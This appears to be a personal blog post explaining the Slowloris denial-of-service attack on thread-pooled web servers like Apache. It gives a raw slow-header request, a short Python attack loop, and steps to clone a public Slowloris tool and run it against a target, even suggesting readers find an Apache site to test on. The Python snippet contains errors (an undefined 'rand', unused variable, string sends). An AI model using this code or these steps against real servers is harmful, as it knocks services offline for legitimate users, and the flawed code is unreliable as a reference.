i Slowloris ddos – All things in moderation

Slowloris ddos

SLOWLORIS

About Slowloris

Developed by Robert “Rsnake” Hasen, Slowloris is DDos attack software that enables a single computer to take down a web server. It requires minimal bandwidth to implement and affects the target server’s web server only, with almost no side effects on other servers and ports.

Attack desctiption

The idea of Slowloris is simple. It targets servers that use thread pools(mainly Apache). That means instead of trying to fil a servers internet pipes, Slowloris makes it run out of threads. This makes the server unable to responsed to legitimate users. Asynchronous/event-driven servers, such as nginx and Nodejs, are not vulnerable to this.
That why we are switching from apache to nginx or others.

Slowloris works by opening multiple connections to the targeted web server and keeping them open as longs as possible. Let’s see how a threaded server would actually respond to a client. First of all, the server accepts a connection. After this, it reads the request method, the path and all the headers. After reading all the headers, the server sends a reponse and closes the connection.

Slowloris explois the fact that the server need to read all headers before replying to a client. It connects to a server and sends a request just like normal users; but instead of sending all the headers and completing the request, it keeps seding headers really slowly. This keeps the connection open and it keeps the thread handling it occupied. Which mean tha thread can’t serve actual users.
Here how it looks like in simple way:

GET / HTTP/1.1
Host: target.com
User-Agent: Gecko
[waits 10 seconds]
X-test: 145
[waits 10 seconds]
X-test: 43
[waits 10 seconds]
X-test: 7
[waits 10 seconds]
...

Python implementation

First of all, we will need to construct an array of socket connections

socket_list = []
for i in range(150):
    s = socket.socket()
    s.connect(("example.com", 80))
    s.send("GET / HTTP/1.1\r\n")
    s.send("Host: example.com\r\n")

    socket_list.append(s)  

Next, we will set up a loop to send the headers

while True:
    for s in socket_list:
        header = "X-test: {}\r\n".format(random.randint(1, 5000))
        s.send("X-a: {}\r\n".format(rand.randint(1, 5000)).encode("utf-8"))
    time.sleep(10)

It’s just a simple implementation, to make it’s works it real situation we need more than that. Here are the source code for you to if you want more details.

Demo

Clone source code from github

git clone https://github.com/gkbrk/slowloris.git  

Actually, you need setup python enviroment and packages required.

Run a default arguments:

python slowloris.py target.com  

Find a website is using apache server or setup on local to test. I tested, it’s works.

Leave a Reply